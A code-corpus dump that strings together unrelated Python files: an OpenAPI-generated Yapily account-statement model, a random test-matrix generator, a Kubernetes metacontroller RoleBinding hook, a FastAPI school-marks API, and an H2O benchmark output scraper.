classification_model_dnli = ClassificationModel(num_labels=3,model_name_or_path=args.model)
classification_model_dnli.model = classification_model_dnli.model.to(device)
print('model loaded')
classification_model_dnli.model.eval()
score_data(args, classification_model_dnli)
| true | true |
1c4a7a0b653d94fb65060004a335ac768d0fbace | 5,776 | py | Python | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 11 | 2018-05-18T14:38:49.000Z | 2021-09-08T13:24:37.000Z | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 5 | 2019-10-23T15:06:33.000Z | 2021-08-03T21:18:50.000Z | sdk/yapily/models/account_statement.py | yapily/yapily-sdk-python | c09930c44e8795e270e2846a2c0fb783200df76a | [
"MIT"
] | 8 | 2019-04-27T00:02:18.000Z | 2021-11-21T02:54:12.000Z | # coding: utf-8
"""
Yapily API
To access endpoints that require authentication, use your application key and secret created in the Dashboard (https://dashboard.yapily.com) # noqa: E501
The version of the OpenAPI document: 1.154.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from yapily.configuration import Configuration
class AccountStatement(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'start_date_time': 'datetime',
'end_date_time': 'datetime',
'creation_date_time': 'datetime'
}
attribute_map = {
'id': 'id',
'start_date_time': 'startDateTime',
'end_date_time': 'endDateTime',
'creation_date_time': 'creationDateTime'
}
def __init__(self, id=None, start_date_time=None, end_date_time=None, creation_date_time=None, local_vars_configuration=None): # noqa: E501
"""AccountStatement - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._start_date_time = None
self._end_date_time = None
self._creation_date_time = None
self.discriminator = None
if id is not None:
self.id = id
if start_date_time is not None:
self.start_date_time = start_date_time
if end_date_time is not None:
self.end_date_time = end_date_time
if creation_date_time is not None:
self.creation_date_time = creation_date_time
@property
def id(self):
"""Gets the id of this AccountStatement. # noqa: E501
:return: The id of this AccountStatement. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this AccountStatement.
:param id: The id of this AccountStatement. # noqa: E501
:type: str
"""
self._id = id
@property
def start_date_time(self):
"""Gets the start_date_time of this AccountStatement. # noqa: E501
:return: The start_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._start_date_time
@start_date_time.setter
def start_date_time(self, start_date_time):
"""Sets the start_date_time of this AccountStatement.
:param start_date_time: The start_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._start_date_time = start_date_time
@property
def end_date_time(self):
"""Gets the end_date_time of this AccountStatement. # noqa: E501
:return: The end_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._end_date_time
@end_date_time.setter
def end_date_time(self, end_date_time):
"""Sets the end_date_time of this AccountStatement.
:param end_date_time: The end_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._end_date_time = end_date_time
@property
def creation_date_time(self):
"""Gets the creation_date_time of this AccountStatement. # noqa: E501
:return: The creation_date_time of this AccountStatement. # noqa: E501
:rtype: datetime
"""
return self._creation_date_time
@creation_date_time.setter
def creation_date_time(self, creation_date_time):
"""Sets the creation_date_time of this AccountStatement.
:param creation_date_time: The creation_date_time of this AccountStatement. # noqa: E501
:type: datetime
"""
self._creation_date_time = creation_date_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccountStatement):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, AccountStatement):
return True
return self.to_dict() != other.to_dict()
| 29.025126 | 158 | 0.608899 |
import pprint
import re
import six
from yapily.configuration import Configuration
class AccountStatement(object):
openapi_types = {
'id': 'str',
'start_date_time': 'datetime',
'end_date_time': 'datetime',
'creation_date_time': 'datetime'
}
attribute_map = {
'id': 'id',
'start_date_time': 'startDateTime',
'end_date_time': 'endDateTime',
'creation_date_time': 'creationDateTime'
}
def __init__(self, id=None, start_date_time=None, end_date_time=None, creation_date_time=None, local_vars_configuration=None): if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._start_date_time = None
self._end_date_time = None
self._creation_date_time = None
self.discriminator = None
if id is not None:
self.id = id
if start_date_time is not None:
self.start_date_time = start_date_time
if end_date_time is not None:
self.end_date_time = end_date_time
if creation_date_time is not None:
self.creation_date_time = creation_date_time
@property
def id(self):
return self._id
@id.setter
def id(self, id):
self._id = id
@property
def start_date_time(self):
return self._start_date_time
@start_date_time.setter
def start_date_time(self, start_date_time):
self._start_date_time = start_date_time
@property
def end_date_time(self):
return self._end_date_time
@end_date_time.setter
def end_date_time(self, end_date_time):
self._end_date_time = end_date_time
@property
def creation_date_time(self):
return self._creation_date_time
@creation_date_time.setter
def creation_date_time(self, creation_date_time):
self._creation_date_time = creation_date_time
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, AccountStatement):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, AccountStatement):
return True
return self.to_dict() != other.to_dict()
| true | true |
1c4a7a49f884812045349d0f5b1b1b674809dc4f | 1,968 | py | Python | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
] | 2 | 2021-03-04T13:38:00.000Z | 2021-04-09T13:40:00.000Z | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
] | null | null | null | CuSVD/testcases/gen_testcase.py | praeclarumjj3/CuML | 1c812d3b07a11c3a69a284d9960058a874d97bfa | [
"MIT"
] | 2 | 2020-12-13T18:21:18.000Z | 2021-08-17T06:55:56.000Z | #!/usr/bin/python3
#########################################################################
# Generate M x N matrix of real numbers and store #
# the the matrix in file named 'testcase_<M>_<N>' #
# Parameters: #
# M :no of rows (samples) in matrix #
# N :no of coulmns (features) in matrix #
# lrange, urange :range of matrix elements ie #
# forall 0<=i<M, 0<=j<N #
# lrange <= matrix[i][j] <= urange #
# Format of output file: #
# ----------------------------------------------------------------- #
# | M N #
# | D[0][0] D[0][1] ... D[0][N-1] D[1][0] ... D[M-1][N-1] #
# ----------------------------------------------------------------- #
#########################################################################
from random import uniform
from sklearn.preprocessing import StandardScaler
M = 1000 # number of rows (samples) in input matrix D
N = 300 # number of columns (features) in input matrix
lrange = -100000 # lrange <= element of matrix
urange = 100000 # element of matrix <= urange
# generate the matrix
D = []
for i in range(M):
temp = []
for j in range(N):
temp.append(uniform(lrange, urange))
D.append(temp)
# standardize
X_std = StandardScaler().fit_transform(D)
filename = 'testcase_' + str(M) + '_' + str(N) #output filename
file = open(filename, 'w')
# write size of matrix in first line of file
file.write(str(M) + ' ' +str(N) + '\n')
# write space separated matrix elements
for i in range(M):
for j in range(N):
file.write('%.7f ' %(X_std[i][j]))
file.close()
| 38.588235 | 73 | 0.399898 |
from random import uniform
from sklearn.preprocessing import StandardScaler
M = 1000 N = 300 lrange = -100000 urange = 100000
D = []
for i in range(M):
temp = []
for j in range(N):
temp.append(uniform(lrange, urange))
D.append(temp)
X_std = StandardScaler().fit_transform(D)
filename = 'testcase_' + str(M) + '_' + str(N) file = open(filename, 'w')
file.write(str(M) + ' ' +str(N) + '\n')
for i in range(M):
for j in range(N):
file.write('%.7f ' %(X_std[i][j]))
file.close()
| true | true |
1c4a7b6fc80a80c5c89ab92e7173ca90f412ed2c | 1,717 | py | Python | examples/clusteredparent/sync.py | rahulchheda/metac | 40b547db945dd1a45cb2d62205d1c59e278bd678 | [
"Apache-2.0"
] | 577 | 2018-03-22T01:31:59.000Z | 2022-02-16T15:19:12.000Z | examples/clusteredparent/sync.py | DalavanCloud/metacontroller | 98610b6e15cbe8b6ccd3bca0928dce0ce54c548d | [
"Apache-2.0"
] | 391 | 2020-05-19T09:33:07.000Z | 2022-03-31T17:27:18.000Z | examples/clusteredparent/sync.py | DalavanCloud/metacontroller | 98610b6e15cbe8b6ccd3bca0928dce0ce54c548d | [
"Apache-2.0"
] | 117 | 2018-03-22T01:40:47.000Z | 2022-03-25T08:57:53.000Z | #!/usr/bin/env python
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
def new_rolebinding(name):
rolebinding = {}
rolebinding['apiVersion'] = 'rbac.authorization.k8s.io/v1'
rolebinding['kind'] = 'RoleBinding'
rolebinding['metadata'] = {}
rolebinding['metadata']['name'] = name
rolebinding['metadata']['namespace'] = "default"
rolebinding['subjects'] = [{'kind': 'ServiceAccount', 'name': 'default', 'namespace': 'default'}]
rolebinding['roleRef'] = {'kind': 'ClusterRole', 'name': name, 'apiGroup': 'rbac.authorization.k8s.io'}
return rolebinding
class Controller(BaseHTTPRequestHandler):
def sync(self, clusterrole, children):
return {'attachments': [new_rolebinding(clusterrole['metadata']['name'])] }
def do_POST(self):
observed = json.loads(self.rfile.read(int(self.headers.getheader('content-length'))))
desired = self.sync(observed['object'], observed['attachments'])
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(desired))
HTTPServer(('', 80), Controller).serve_forever()
| 37.326087 | 105 | 0.726849 |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
def new_rolebinding(name):
rolebinding = {}
rolebinding['apiVersion'] = 'rbac.authorization.k8s.io/v1'
rolebinding['kind'] = 'RoleBinding'
rolebinding['metadata'] = {}
rolebinding['metadata']['name'] = name
rolebinding['metadata']['namespace'] = "default"
rolebinding['subjects'] = [{'kind': 'ServiceAccount', 'name': 'default', 'namespace': 'default'}]
rolebinding['roleRef'] = {'kind': 'ClusterRole', 'name': name, 'apiGroup': 'rbac.authorization.k8s.io'}
return rolebinding
class Controller(BaseHTTPRequestHandler):
def sync(self, clusterrole, children):
return {'attachments': [new_rolebinding(clusterrole['metadata']['name'])] }
def do_POST(self):
observed = json.loads(self.rfile.read(int(self.headers.getheader('content-length'))))
desired = self.sync(observed['object'], observed['attachments'])
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(desired))
HTTPServer(('', 80), Controller).serve_forever()
| true | true |
1c4a7b98fa5883d11c06bf2f920e1ba0096ba6ec | 5,226 | py | Python | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | services/backend/app/api/v1/endpoints/marks.py | moxxiq/online-diary | 5949cb5631d49622a31885519a880b17a0816988 | [
"MIT"
] | null | null | null | from fastapi import APIRouter, status, HTTPException, Path, Depends
import app.core.crud as crud
from app.core.authorization import get_current_user, get_current_user_with_scopes
from app.core.schemas.users import UserWithID
from app.core.schemas.marks import Mark, MarkDB, MarkContent
router = APIRouter()
@router.post("/marks", response_model=MarkDB, status_code=status.HTTP_201_CREATED)
async def create_marks(payload: Mark, current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
# TODO: remove vulnerability so that student could get mark for work of other classes work
mark_in_db = await crud.marks.get_by_work_student(work_id=payload.work_id, student_id=payload.student_id)
if mark_in_db:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Mark is already set")
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
mark_id = await crud.marks.post(payload)
response_object = await crud.marks.get(mark_id)
return response_object
@router.patch("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_marks(payload: MarkContent, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
# TODO: remove vulnerability so that student could get mark for work of other classes work
# TODO: remove vulnerability so that another teacher can correct marks of other teachers
await crud.marks.patch(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.put("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_or_create_marks(payload: Mark, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
# TODO: remove vulnerability so that student could get mark for work of other classes work
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
await crud.marks.put(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.get("/marks/{id}", response_model=MarkDB)
async def read_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to see the marks of other teachers")
return mark_in_db
@router.delete("/marks/{id}", response_model=MarkDB)
async def delete_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not found")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to delete the marks of other teachers")
await crud.marks.delete(id)
return mark_in_db
@router.get("/works/{work_id}/students/{student_id}/marks", response_model=MarkDB)
async def read_work_student_marks(work_id: int = Path(..., gt=0), student_id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get_by_work_student(work_id, student_id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to see the marks of other teachers")
return mark_in_db
| 67.87013 | 178 | 0.726177 | from fastapi import APIRouter, status, HTTPException, Path, Depends
import app.core.crud as crud
from app.core.authorization import get_current_user, get_current_user_with_scopes
from app.core.schemas.users import UserWithID
from app.core.schemas.marks import Mark, MarkDB, MarkContent
router = APIRouter()
@router.post("/marks", response_model=MarkDB, status_code=status.HTTP_201_CREATED)
async def create_marks(payload: Mark, current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get_by_work_student(work_id=payload.work_id, student_id=payload.student_id)
if mark_in_db:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Mark is already set")
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
mark_id = await crud.marks.post(payload)
response_object = await crud.marks.get(mark_id)
return response_object
@router.patch("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_marks(payload: MarkContent, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
await crud.marks.patch(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.put("/marks/{id}", response_model=MarkDB, status_code=status.HTTP_200_OK)
async def correct_or_create_marks(payload: Mark, id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
if (current_user.get("type") == 2) and (current_user.get("id") != (await crud.works.get_teacher_of_the_work(payload.work_id)).get("user_id")):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to set the marks for other teacher works")
await crud.marks.put(id, payload)
response_object = await crud.marks.get(id)
return response_object
@router.get("/marks/{id}", response_model=MarkDB)
async def read_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Teacher is not allowed to see the marks of other teachers")
return mark_in_db
@router.delete("/marks/{id}", response_model=MarkDB)
async def delete_marks(id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2]))):
mark_in_db = await crud.marks.get(id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not found")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to delete the marks of other teachers")
await crud.marks.delete(id)
return mark_in_db
@router.get("/works/{work_id}/students/{student_id}/marks", response_model=MarkDB)
async def read_work_student_marks(work_id: int = Path(..., gt=0), student_id: int = Path(..., gt=0), current_user: UserWithID = Depends(get_current_user_with_scopes([1, 2, 3]))):
mark_in_db = await crud.marks.get_by_work_student(work_id, student_id)
if not mark_in_db:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Mark not set")
if current_user.get("type") not in [1, 2]:
if current_user.get("id") != mark_in_db.get("student_id"):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="Student is not allowed to see the marks of others")
if (current_user.get("id") != (await crud.works.get_teacher_of_the_work(mark_in_db.get("work_id"))).get("user_id")) and (current_user.get("type") == 2):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
detail="Techer is not allowed to see the marks of other teachers")
return mark_in_db
| true | true |
1c4a7be7ea527484692bd99033eb1f536a3b8881 | 18,777 | py | Python | h2o-perf/bench/py/h2oPerf/Scrape.py | gigliovale/h2o | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 882 | 2015-05-22T02:59:21.000Z | 2022-02-17T05:02:48.000Z | h2o-perf/bench/py/h2oPerf/Scrape.py | VonRosenchild/h2o-2 | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 1 | 2022-02-22T12:15:02.000Z | 2022-02-22T12:15:02.000Z | h2o-perf/bench/py/h2oPerf/Scrape.py | VonRosenchild/h2o-2 | be350f3f2c2fb6f135cc07c41f83fd0e4f521ac1 | [
"Apache-2.0"
] | 392 | 2015-05-22T17:04:11.000Z | 2022-02-22T09:04:39.000Z | from Table import *
import json
import os
import re
import subprocess
import time
import MySQLdb
class Scraper:
"""
Objects of this class scrape the R stdouterr for
relevant information that needs to percolate back
to the database.
Because of the different phases (parse, model, predict),
there is a switch that redirects control to a subclass
scraper of the appropriate type.
Each phase will insert a row into the test_run_phase_result
table in the db, and possibly percolate pieces of the test_run
table back to the PerfRunner object.
Some subclasses of the Scraper will insert data into the math results tables.
"""
def __init__(self, perfdb, phase, test_dir, test_short_dir, output_dir, output_file_name):
self.perfdb = perfdb
self.phase = phase
self.test_dir = test_dir
self.test_short_dir = test_short_dir
self.output_dir = output_dir
self.output_file_name = output_file_name
self.did_time_pass = 0
self.did_correct_pass = 0
self.contaminated = 0
self.contamination_message = ""
def scrape(self):
"""
Switches out to the phase scraper for scraping R output.
The subclass object is then invoked and an object with
table information is percolated back to the caller.
"""
phase_scraper = self.__switch__()
res = phase_scraper.invoke()
self.did_time_pass = phase_scraper.did_time_pass
self.did_correct_pass = phase_scraper.did_correct_pass
self.contaminated = phase_scraper.contaminated
self.contamination_message = phase_scraper.contamination_message
return res
def __switch__(self):
"""
Switch to scraper for the appropriate phase.
"""
return {
'parse': ParseScraper(self),
'model': ModelScraper(self),
'predict': PredictScraper(self),
}[self.phase]
class ParseScraper(Scraper):
"""
An object that performs the scraping for the Parse phase.
Relevant tables and their fields:
>test_run:
[dataset_name, dataset_source, train_dataset_url, test_dataset_url]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run = {
'dataset_source': '',
'train_dataset_url': '',
'test_dataset_url': '',
}
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
The phase result is handled in the __init__ of this object.
The work be done here is on the self.test_run dictionary
@return: test_run dictionary
"""
self.insert_phase_result()
self.test_run.update(self.__scrape_parse_result__())
return self.test_run
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_parse_result__(self):
parse_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
parse_r = json.loads(line)
flag = False
break
if "PARSE RESULT" in line and "print" not in line:
flag = True
return parse_r['parse_result']
class ModelScraper(Scraper):
"""
An object that performs the scraping for the Model phase.
Relevant tables and their fields:
>test_run_clustering_result:
[k, withinss]
>test_run_model_result:
[model_json]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_model_result = TableRow("test_run_model_result", self.perfdb)
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
Additionally handles the KMeans clustering results table.
@return: None
"""
self.insert_phase_result()
kmeans_result = self.__scrape_kmeans_result__()
if kmeans_result:
self.test_run_clustering_result = TableRow("test_run_clustering_result", self.perfdb)
self.test_run_clustering_result.row.update(kmeans_result)
self.test_run_clustering_result.update()
comp_result = self.__scrape_comparison_result__()
if comp_result != "":
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comp_result['comparison_result'])
self.test_run_binomial_comparison_result.update()
else:
self.test_run_model_result.row['model_json'] = \
MySQLdb.escape_string(str(self.__scrape_model_result__()))
self.test_run_model_result.update()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
return comparison_r
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_kmeans_result__(self):
kmeans_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
kmeans_r = json.loads(line)
flag = False
break
if "KMEANS RESULT" in line and "print" not in line:
flag = True
return None if kmeans_r["kmeans_result"]["k"] == "None" else kmeans_r["kmeans_result"]
def __scrape_model_result__(self):
model_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
model_r = json.loads(line)
flag = False
break
if "MODEL RESULT" in line and "print" not in line:
flag = True
return model_r["model_result"]["model_json"]
class PredictScraper(Scraper):
"""
An object that performs the scraping for the Predict phase.
This object is not awlays used, e.g. in the case of KMeans and PCA,
there is no prediction phase, but the results still need to be
verified.
Relevant tables and their fields:
>test_run_binomial_classification_result:
[auc, precision, recall, error_rate, minoriy_error_rate]
>test_run_cm_result:
[levels_json, cm_json, representation]
>test_run_multinomial_classification_result:
[level, level_actual_count, level_predicted_correctly_count, level_error_rate]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
>test_run_regression_result:
[aic, null_deviance, residual_deviance]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_binomial_classification_result = ""
self.test_run_cm_result = ""
self.test_run_phase_result = ""
self.test_run_regression_result = ""
self.test_run_binomial_comparison_result = ""
self.test_run_multinomial_classification_result = ""
def invoke(self):
"""
Scrapes the stdouterr from the R phase.
This invoke method will pass off control to the appropriate result scraper
using the __switch__ override.
Some preliminary scraping will be done here to obtain the correct result type.
@return: None
"""
self.insert_phase_result()
predict_type = ""
# with open(self.output_file_name, "r") as f:
# flag = False
# for line in f:
# if flag:
# print "---------------------------------"
# print line
# print "---------------------------------"
# predict_type = self.__get_predict_type__(line.strip())[0]
# flag = False
# break
# if "PREDICT TYPE" in line and "print" not in line:
# flag = True
# self.result_type = predict_type
# print "GOT RESULT TYPE: " + predict_type
# self.__switch__()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
